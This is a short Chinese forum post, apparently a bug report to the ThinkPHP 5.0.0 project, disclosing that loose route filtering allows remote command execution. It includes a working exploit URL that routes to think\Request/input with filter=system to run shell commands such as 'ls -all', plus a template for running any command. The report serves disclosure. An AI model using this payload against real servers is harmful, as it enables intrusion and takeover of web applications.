路由过滤不严谨导致getshel漏洞l

浏览:1040 发布日期:2018/12/24
5.0.0 - 致命 - 已关闭
[email][/email]代码样例http://xxxxxx/index.php?s=index/\think\Request/input&data[h]=ls -all&name=h&filter=system如下http://xxxxxx/index.php?s=index/\think\Request/input&data[h]=【此处可以写任意shell】&name=h&filter=system我知道很有可能是我小白所以使用不当造成的 但是还是一个隐患 希望能够修正
十分感谢
我等菜鸟感激不尽
评论(
后面还有条评论,点击查看>>